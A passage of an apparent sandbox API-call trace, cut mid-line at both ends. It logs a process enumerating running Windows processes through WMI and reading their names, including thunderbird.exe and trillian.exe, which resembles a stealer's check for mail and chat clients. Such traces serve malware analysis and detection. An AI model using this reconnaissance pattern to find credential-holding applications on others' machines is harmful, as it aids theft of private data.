riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.265] IUnknown:Release (This=0x552b844) returned 0x3 [0265.265] IUnknown:QueryInterface (in: This=0x552b840, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.265] IUnknown:Release (This=0x552b840) returned 0x2 [0265.266] IUnknown:QueryInterface (in: This=0x552b840, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552b840) returned 0x0 [0265.266] IUnknown:AddRef (This=0x552b840) returned 0x4 [0265.266] IUnknown:Release (This=0x552b840) returned 0x3 [0265.266] IUnknown:Release (This=0x552b840) returned 0x2 [0265.266] CoTaskMemFree (pv=0x54ba2d8) [0265.266] IUnknown:AddRef (This=0x552b840) returned 0x3 [0265.266] IWbemClassObject:Get (in: This=0x552b840, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.266] IWbemClassObject:Get (in: This=0x552b840, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3940\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.266] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3940\"") returned 0x5e [0265.266] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3940\"") returned 0x5e [0265.266] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.267] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.267] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.267] IUnknown:Release (This=0x601a94) returned 0x1 [0265.268] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba2d8) returned 0x0 [0265.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba2d8, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.268] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba2d8, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a9a8) returned 0x0 [0265.268] WbemDefPath:IUnknown:Release (This=0x54ba2d8) returned 0x0 [0265.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a9a8) returned 0x0 [0265.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.268] WbemDefPath:IUnknown:AddRef (This=0x552a9a8) returned 0x3 [0265.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.268] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x55294f8) returned 0x0 [0265.269] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x55294f8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.269] WbemDefPath:IUnknown:Release (This=0x55294f8) returned 0x3 [0265.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.269] WbemDefPath:IUnknown:Release (This=0x552a9a8) returned 0x2 [0265.269] WbemDefPath:IUnknown:Release (This=0x552a9a8) returned 0x1 [0265.269] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a9a8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a9a8) returned 0x0 [0265.269] WbemDefPath:IUnknown:AddRef (This=0x552a9a8) returned 0x3 [0265.269] WbemDefPath:IUnknown:Release (This=0x552a9a8) returned 0x2 [0265.269] WbemDefPath:IWbemPath:SetText (This=0x552a9a8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"3940\"") returned 0x0 [0265.269] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.269] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.269] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.270] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.270] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.270] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.270] IWbemClassObject:Get (in: This=0x552b840, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23df0d4*=0, plFlavor=0x23df0d8*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x23df0d4*=8, plFlavor=0x23df0d8*=0) returned 0x0 [0265.270] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0265.270] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0265.270] IWbemClassObject:Get (in: This=0x552b840, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23df0d4*=8, plFlavor=0x23df0d8*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x23df0d4*=8, plFlavor=0x23df0d8*=0) returned 0x0 [0265.270] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0265.270] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0265.270] CoTaskMemAlloc (cb=0x4) returned 0x54ba2d8 [0265.270] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba2d8, puReturned=0x23c1fd0 | out: apObjects=0x54ba2d8*=0x552d028, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.271] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552d028) returned 0x0 [0265.271] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.271] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.271] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.272] IUnknown:AddRef (This=0x552d028) returned 0x3 [0265.272] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0265.272] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0265.272] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x552d02c) returned 0x0 [0265.272] IMarshal:GetUnmarshalClass (in: This=0x552d02c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0265.272] IUnknown:Release (This=0x552d02c) returned 0x3 [0265.272] IUnknown:QueryInterface (in: This=0x552d028, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0265.272] IUnknown:Release (This=0x552d028) returned 0x2 [0265.272] IUnknown:QueryInterface (in: This=0x552d028, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x552d028) returned 0x0 [0265.272] IUnknown:AddRef (This=0x552d028) returned 0x4 [0265.272] IUnknown:Release (This=0x552d028) returned 0x3 [0265.272] IUnknown:Release (This=0x552d028) returned 0x2 [0265.273] CoTaskMemFree (pv=0x54ba2d8) [0265.273] IUnknown:AddRef (This=0x552d028) returned 0x3 [0265.273] IWbemClassObject:Get (in: This=0x552d028, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0265.273] IWbemClassObject:Get (in: This=0x552d028, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4100\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0265.273] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4100\"") returned 0x5e [0265.273] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4100\"") returned 0x5e [0265.273] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0265.273] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0265.273] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0265.273] IUnknown:Release (This=0x601a94) returned 0x1 [0265.275] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba398) returned 0x0 [0265.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba398, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0265.275] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba398, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x552a7e8) returned 0x0 [0265.275] WbemDefPath:IUnknown:Release (This=0x54ba398) returned 0x0 [0265.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x552a7e8) returned 0x0 [0265.275] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0265.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0265.276] WbemDefPath:IUnknown:AddRef (This=0x552a7e8) returned 0x3 [0265.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0265.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0265.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x5527710) returned 0x0 [0265.276] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5527710, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0265.276] WbemDefPath:IUnknown:Release (This=0x5527710) returned 0x3 [0265.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0265.276] WbemDefPath:IUnknown:Release (This=0x552a7e8) returned 0x2 [0265.276] WbemDefPath:IUnknown:Release (This=0x552a7e8) returned 0x1 [0265.276] WbemDefPath:IUnknown:QueryInterface (in: This=0x552a7e8, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x552a7e8) returned 0x0 [0265.276] WbemDefPath:IUnknown:AddRef (This=0x552a7e8) returned 0x3 [0265.277] WbemDefPath:IUnknown:Release (This=0x552a7e8) returned 0x2 [0265.277] WbemDefPath:IWbemPath:SetText (This=0x552a7e8, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"4100\"") returned 0x0 [0265.277] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0265.277] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0265.277] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.277] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0265.277] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0265.277] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0265.277] IWbemClassObject:Get (in: This=0x552d028, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23df970*=0, plFlavor=0x23df974*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x23df970*=8, plFlavor=0x23df974*=0) returned 0x0 [0265.277] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0265.277] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0265.277] IWbemClassObject:Get (in: This=0x552d028, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23df970*=8, plFlavor=0x23df974*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x23df970*=8, plFlavor=0x23df974*=0) returned 0x0 [0265.277] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0265.277] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0265.278] CoTaskMemAlloc (cb=0x4) returned 0x54ba398 [0265.278] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba398, puReturned=0x23c1fd0 | out: apObjects=0x54ba398*=0x552ccf8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0265.278] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x552ccf8) returned 0x0 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0265.279] IUnknown:AddRef (This=0x552ccf8) returned 0x3 [0265.279] IUnknown:QueryInterface (in: This=0x552ccf8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, 